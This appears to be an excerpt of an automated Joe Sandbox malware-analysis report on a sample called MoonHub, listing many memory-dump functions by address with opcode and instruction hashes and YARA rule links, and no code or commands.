                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4dbbbf9414dff81458c352b99e05ad13a0204cb0e4f49d5d7ac49ff18b96cb2b
                                                                                                                                                                                • Instruction ID: c7e4aafd9f0638c3e587570dfb14fc657a51d19ce6b73c63f83b30fababde402
                                                                                                                                                                                • Opcode Fuzzy Hash: 4dbbbf9414dff81458c352b99e05ad13a0204cb0e4f49d5d7ac49ff18b96cb2b
                                                                                                                                                                                • Instruction Fuzzy Hash: 0C112771A0D7841FD315BA38441553A7FD1FFD6694B1901BED08AC7293DE296C038395
                                                                                                                                                                                Function 00007FF848E9F078 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 633fdd292184a7f6faac79b18dbb95732a9a6b5c2debe741e67a1a54f8b2b71c
                                                                                                                                                                                • Instruction ID: dbd0cd52bec91d4427e7d351ed646ca7dcbb9292acfd5711dd151692ab970077
                                                                                                                                                                                • Opcode Fuzzy Hash: 633fdd292184a7f6faac79b18dbb95732a9a6b5c2debe741e67a1a54f8b2b71c
                                                                                                                                                                                • Instruction Fuzzy Hash: 06119022D1CA5E8DF7B4B22888112FA72D4FFA97A0F440175E81DC24C2DF39391A0989
                                                                                                                                                                                Function 00007FF848EA932C Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8b81d1806d5ebcf004c18b06ddf721ee8be6b81ad5ecd224a778751be15f2ead
                                                                                                                                                                                • Instruction ID: 422bc6920264cc0800f14926c4410a18e8151de8057cfde715faff3fede032bd
                                                                                                                                                                                • Opcode Fuzzy Hash: 8b81d1806d5ebcf004c18b06ddf721ee8be6b81ad5ecd224a778751be15f2ead
                                                                                                                                                                                • Instruction Fuzzy Hash: C9112B3591CB990FE711BB3498100BABFF0FF85384F0405BBE88DD71A2EA3899448746
                                                                                                                                                                                Function 00007FF848EA5788 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0dd2624d66a3c13f6081df7a081ebcd14d0caef4f8dc6f6f693c5f3edeab9d49
                                                                                                                                                                                • Instruction ID: 7cf57258927f0f6b6544b23dd7c048e94fc2b01057c3fca04693306c49d21a73
                                                                                                                                                                                • Opcode Fuzzy Hash: 0dd2624d66a3c13f6081df7a081ebcd14d0caef4f8dc6f6f693c5f3edeab9d49
                                                                                                                                                                                • Instruction Fuzzy Hash: 7D11BF32D0CA5E4EF6B4F2285C112FA76D0FF89B90F440179D49DC35C2EF3A290A0589
                                                                                                                                                                                Function 00007FF848EA9359 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d69f813bdfe7a48f89c96dd0f3803603f864f5154575760b90312c092840dced
                                                                                                                                                                                • Instruction ID: ecd947d7d4907ebeb2e125f889112572125c859d8a2389b8fcfbaf289dba5aec
                                                                                                                                                                                • Opcode Fuzzy Hash: d69f813bdfe7a48f89c96dd0f3803603f864f5154575760b90312c092840dced
                                                                                                                                                                                • Instruction Fuzzy Hash: FB11252084D7C50FE342B73448554B67FE0FF86254F0806BBE8CDC60A2DA2C95858352
                                                                                                                                                                                Function 00007FF848E9D58E Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 82a7c169f322c1e04a6cfaa7b13a7742a0a521d9ed7f82aa466791e3fabc6b13
                                                                                                                                                                                • Instruction ID: 769ee6e19133fd1201b23ac0b26a9269cb79e5650f591503cdb484dc6d9257e8
                                                                                                                                                                                • Opcode Fuzzy Hash: 82a7c169f322c1e04a6cfaa7b13a7742a0a521d9ed7f82aa466791e3fabc6b13
                                                                                                                                                                                • Instruction Fuzzy Hash: 75112630A18A1E8FDF84EF58C8546EEB3A1FF58344F100179E41ED7296DE39A852CB80
                                                                                                                                                                                Function 00007FF848EA1608 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 13a3a4b696e64cb761b00c361f619620189fe03f613577a83f831acde83cfd67
                                                                                                                                                                                • Instruction ID: 8ff2c89467f409407a3d9111c7b24b8a2ef3b90ae67ef1303b51ec008adcc95a
                                                                                                                                                                                • Opcode Fuzzy Hash: 13a3a4b696e64cb761b00c361f619620189fe03f613577a83f831acde83cfd67
                                                                                                                                                                                • Instruction Fuzzy Hash: 9311E534A1C7481FD754EA29841997A7BD6FFD5794B24017DD48AC3292DE396C028285
                                                                                                                                                                                Function 00007FF848E9E599 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 534a79ad190b633772f85f7b5232ab802b149f1e6755ab98b914b3d215fe3dcd
                                                                                                                                                                                • Instruction ID: 06ef604c94b5021899a08e250c7a8002e4b6cf7b6fe5bb7054329f3b2118836a
                                                                                                                                                                                • Opcode Fuzzy Hash: 534a79ad190b633772f85f7b5232ab802b149f1e6755ab98b914b3d215fe3dcd
                                                                                                                                                                                • Instruction Fuzzy Hash: 7E11B234A0894ECFDB88EF58C894AAA73F2FF68304F145165D419C7259CB74ED52CB44
                                                                                                                                                                                Function 00007FF848EA9848 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 678e22442c6085638cd3b72083ffc0a6042b382b10e4cee3833a5d3ba4d2f242
                                                                                                                                                                                • Instruction ID: d4d75b72cd667d1778db72042189abefd44c1886ba3410862fa8b71803bc5889
                                                                                                                                                                                • Opcode Fuzzy Hash: 678e22442c6085638cd3b72083ffc0a6042b382b10e4cee3833a5d3ba4d2f242
                                                                                                                                                                                • Instruction Fuzzy Hash: 3B113A3190CB854FD30AF72868A50B57BE4FF95795F0842BBD059CB1F3EA2845548399
                                                                                                                                                                                Function 00007FF848EAF910 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f84feaf258da16ce644c36a6e818e41938ef61f95f16ec9510eac6b2afe6945e
                                                                                                                                                                                • Instruction ID: 0977d247349494bb21aeb6652a95e68c052dbb3d0c317ea403dda45770335aed
                                                                                                                                                                                • Opcode Fuzzy Hash: f84feaf258da16ce644c36a6e818e41938ef61f95f16ec9510eac6b2afe6945e
                                                                                                                                                                                • Instruction Fuzzy Hash: 9901D622E2CD551FE76CB52D68494B673D1FBA9361B10017FE40FC3587EE25AC468289
                                                                                                                                                                                Function 00007FF848EC70A0 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ae00292fb63c2b5f81f982290564e97a0b1161f596146465d6cafb85d29bd5b3
                                                                                                                                                                                • Instruction ID: 686cd60247d7690f4da9fe6f2ba9f4700e0be6d6f2c876789273d92886973411
                                                                                                                                                                                • Opcode Fuzzy Hash: ae00292fb63c2b5f81f982290564e97a0b1161f596146465d6cafb85d29bd5b3
                                                                                                                                                                                • Instruction Fuzzy Hash: 28117030E1CE0A8FEBA9A63C4856676B2D1FB5A340F24447CD04FC2184DF39E8428744
                                                                                                                                                                                Function 00007FF848E9CDEA Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: fa648fee3c990bd74652ce8749fbcd2f9494362f6f6353ead13659334d27698b
                                                                                                                                                                                • Instruction ID: 6997cb35b36f0a3dd4f0bc8e3a7eb126e520cd7c9d078a6e3e662a4baeadc315
                                                                                                                                                                                • Opcode Fuzzy Hash: fa648fee3c990bd74652ce8749fbcd2f9494362f6f6353ead13659334d27698b
                                                                                                                                                                                • Instruction Fuzzy Hash: 56114C30608A499FDB81EB688455BEA73E2FF58354F5840B9D44DCB256DA78EC818B40
                                                                                                                                                                                Function 00007FF848E9CD47 Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 85cc8000a2a2a4402b8fabd1768f51808483155b6b1ff56a54769b87685d758d
                                                                                                                                                                                • Instruction ID: 6ea01efc4a928933dbc9509acc75affdd9412ca1d80dcd2bc70a0953903135c1
                                                                                                                                                                                • Opcode Fuzzy Hash: 85cc8000a2a2a4402b8fabd1768f51808483155b6b1ff56a54769b87685d758d
                                                                                                                                                                                • Instruction Fuzzy Hash: 95112E30609A499FDB81EF688454BEA77E2FF58350F1844B9E44DCB297DA38DC518B40
                                                                                                                                                                                Function 00007FF848EC7320 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 327c68fec26453bd04a2cb064ee01a9204ae08e8d9e8f97d3f81310f6a9897ea
                                                                                                                                                                                • Instruction ID: 02591fe8a875f5d2583392ac527cc4744b0c927580094ceafa984346c0826202
                                                                                                                                                                                • Opcode Fuzzy Hash: 327c68fec26453bd04a2cb064ee01a9204ae08e8d9e8f97d3f81310f6a9897ea
                                                                                                                                                                                • Instruction Fuzzy Hash: 5401D82051E98A0FD30AB73C5C155A57BE0FF87250F4945F6E448C719BDB2C9886C395
                                                                                                                                                                                Function 00007FF848E9426F Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 03b97f5edc5c771577b316edbd3c34de6e066ec66158d713fcad1f0e4e58dd14
                                                                                                                                                                                • Instruction ID: fe5945d7e4857c8c8da57fbae002f26febd8b661cd738724cfc88faa187c2f96
                                                                                                                                                                                • Opcode Fuzzy Hash: 03b97f5edc5c771577b316edbd3c34de6e066ec66158d713fcad1f0e4e58dd14
                                                                                                                                                                                • Instruction Fuzzy Hash: 1A01493290E94E4FEB04AA9AAC405EA7BD4FF8837DF04027AE40CC31C0DBB99456C741
                                                                                                                                                                                Function 00007FF848E9413C Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: bd98e9010e110a6c51ba89d952ec0a1ec10ed6df11caafc2d18c6145796ddac0
                                                                                                                                                                                • Instruction ID: 03887a28a214837101a20041fd74602eaf2cf7c7ca019547b78d4e24e9143912
                                                                                                                                                                                • Opcode Fuzzy Hash: bd98e9010e110a6c51ba89d952ec0a1ec10ed6df11caafc2d18c6145796ddac0
                                                                                                                                                                                • Instruction Fuzzy Hash: F4016530A1850E8FDF88EE55C4506BA73E2FFA8355F149539D40AD3285DA74E8528B40
                                                                                                                                                                                Function 00007FF848E97F74 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 66d21e3ada782e5c045b42936ffc9135e893dd2ff816f01541471c87551905f7
                                                                                                                                                                                • Instruction ID: c6143613c72b98bd73b0e3c7359a9c96ad76639766ed8fbf7275017bd52a9011
                                                                                                                                                                                • Opcode Fuzzy Hash: 66d21e3ada782e5c045b42936ffc9135e893dd2ff816f01541471c87551905f7
                                                                                                                                                                                • Instruction Fuzzy Hash: 1711EC31A1D68A4FDB44FBB8C811BEEBBB0FF45244F4400B9D00AE31A3CE282800C711
                                                                                                                                                                                Function 00007FF848E97388 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c0d9d28d845b11be126a73bf5f4a59da7d7c3d9cb839667da7dad7c18e760de8
                                                                                                                                                                                • Instruction ID: 52f71bc30f9f2570764468ed8f39c05ab89f44e5a0f4ae2455d7ff84bd13e378
                                                                                                                                                                                • Opcode Fuzzy Hash: c0d9d28d845b11be126a73bf5f4a59da7d7c3d9cb839667da7dad7c18e760de8
                                                                                                                                                                                • Instruction Fuzzy Hash: 0F01F97290EBD96FE30AA6755C5D4F63F70FE53155B0841ABF088C60A3EA545809C365
                                                                                                                                                                                Function 00007FF848EE2348 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 28b70374078bab3fdff8666fa376fe56216e0e36cdb4dbfbede26f3000fd8806
                                                                                                                                                                                • Instruction ID: 30d892a8e43eabdda012a6c61b8cee51e5ea83f72371dde12173420aff2e8e9b
                                                                                                                                                                                • Opcode Fuzzy Hash: 28b70374078bab3fdff8666fa376fe56216e0e36cdb4dbfbede26f3000fd8806
                                                                                                                                                                                • Instruction Fuzzy Hash: 90112E2481CF954EFF75A2689044375AAD07F6634CF0848ACD48A826C2CBADB98AD765
                                                                                                                                                                                Function 00007FF848EE9D28 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7ad6c2d3367d291d3d1be41790877832eb9aa681d7e1333d4f84a38abfb588fa
                                                                                                                                                                                • Instruction ID: 5316954a396a4c6c75acfe1fee21a59b79dba90c73c98a163919a1ed562423aa
                                                                                                                                                                                • Opcode Fuzzy Hash: 7ad6c2d3367d291d3d1be41790877832eb9aa681d7e1333d4f84a38abfb588fa
                                                                                                                                                                                • Instruction Fuzzy Hash: E601D821A0D7854FD746E76C54A45707FD1FF96204B1900FBD408CB1E3CA2CDC06831A
                                                                                                                                                                                Function 00007FF848EA140D Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 67d2628d9a4a2c9ddef2e50a7c8da4f84d4bf7a49054c16f223545b09e675d18
                                                                                                                                                                                • Instruction ID: fe73f11ad6694826b6af54a144fe7b70e7569129d132ca3a70530b3429412a6b
                                                                                                                                                                                • Opcode Fuzzy Hash: 67d2628d9a4a2c9ddef2e50a7c8da4f84d4bf7a49054c16f223545b09e675d18
                                                                                                                                                                                • Instruction Fuzzy Hash: 6F01287280DB850FF325A238A8104E57BD1FB916A4F44077BD196CB0F2EE69514E4782
                                                                                                                                                                                Function 00007FF848E9EAA4 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7e2885cea2c74d3fa9e857993c8609d7cb04adb12f873fe3165644fb08eb9ec4
                                                                                                                                                                                • Instruction ID: 64db85d8fceacc4064104c6ac92f92e906bc8dcc20202e95ef4d6040de3956c7
                                                                                                                                                                                • Opcode Fuzzy Hash: 7e2885cea2c74d3fa9e857993c8609d7cb04adb12f873fe3165644fb08eb9ec4
                                                                                                                                                                                • Instruction Fuzzy Hash: 05F02B3190EA0D5EFB48AA48EC16AF73794FB46278F04002EF14DC1052D7F5AC63C245
                                                                                                                                                                                Function 00007FF848ED7C00 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0deed8d2e74aa12a9b8d88a8c1bdd8d632bce4a7467216bd21c5057d9a9e1022
                                                                                                                                                                                • Instruction ID: f58a987830a4c71a432cb2b035fd339bccafafa3498822352fe1555ea9424d5d
                                                                                                                                                                                • Opcode Fuzzy Hash: 0deed8d2e74aa12a9b8d88a8c1bdd8d632bce4a7467216bd21c5057d9a9e1022
                                                                                                                                                                                • Instruction Fuzzy Hash: 61F0B730708C1E8FDA94F71CD858A2577E6FF9835175901A6E40DC7265DF64DC828B81
                                                                                                                                                                                Function 00007FF848E917E9 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6159cbc5b943adde73f3bc9be5b5847002b48b43d22a1ee0e53b118da166315b
                                                                                                                                                                                • Instruction ID: 89320245e95a9ef9aaac6180bc10c033abdcbb558427a63a79acb963dc1b0867
                                                                                                                                                                                • Opcode Fuzzy Hash: 6159cbc5b943adde73f3bc9be5b5847002b48b43d22a1ee0e53b118da166315b
                                                                                                                                                                                • Instruction Fuzzy Hash: C701D43150CB895FC785E718D0605A6BBE1FF89360F8405BEE485C7291CB6599408782
                                                                                                                                                                                Function 00007FF848E97CBC Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d8f1e0e449e746e57d008c602fe714c4c51aca9ba87b59f3a3198b8f9fc5222d
                                                                                                                                                                                • Instruction ID: fc4fa8aa4cf8ccc626127811fed89f396f4447b6a70b2bcffa8298289afb997e
                                                                                                                                                                                • Opcode Fuzzy Hash: d8f1e0e449e746e57d008c602fe714c4c51aca9ba87b59f3a3198b8f9fc5222d
                                                                                                                                                                                • Instruction Fuzzy Hash: C6F0FF32E0890D9EEB90FFA894462FD7BE0FF48380F00017AE40CE3286DE3819058B85
                                                                                                                                                                                Function 00007FF848EA062D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c784b0f1292474befd39664cdd3c4bddfbde6404825fa5d12091a242c8c9ff7c
                                                                                                                                                                                • Instruction ID: f9a81cf46774c7f61eca5c4c3f450a0c41b233ca387f6b971568a8d2cb5d0dd4
                                                                                                                                                                                • Opcode Fuzzy Hash: c784b0f1292474befd39664cdd3c4bddfbde6404825fa5d12091a242c8c9ff7c
                                                                                                                                                                                • Instruction Fuzzy Hash: 6601F53280DB450FF321E63088255DA7BD1BBD12A4F04077AD0A58B0F1EE68650987C2
                                                                                                                                                                                Function 00007FF848E980E3 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
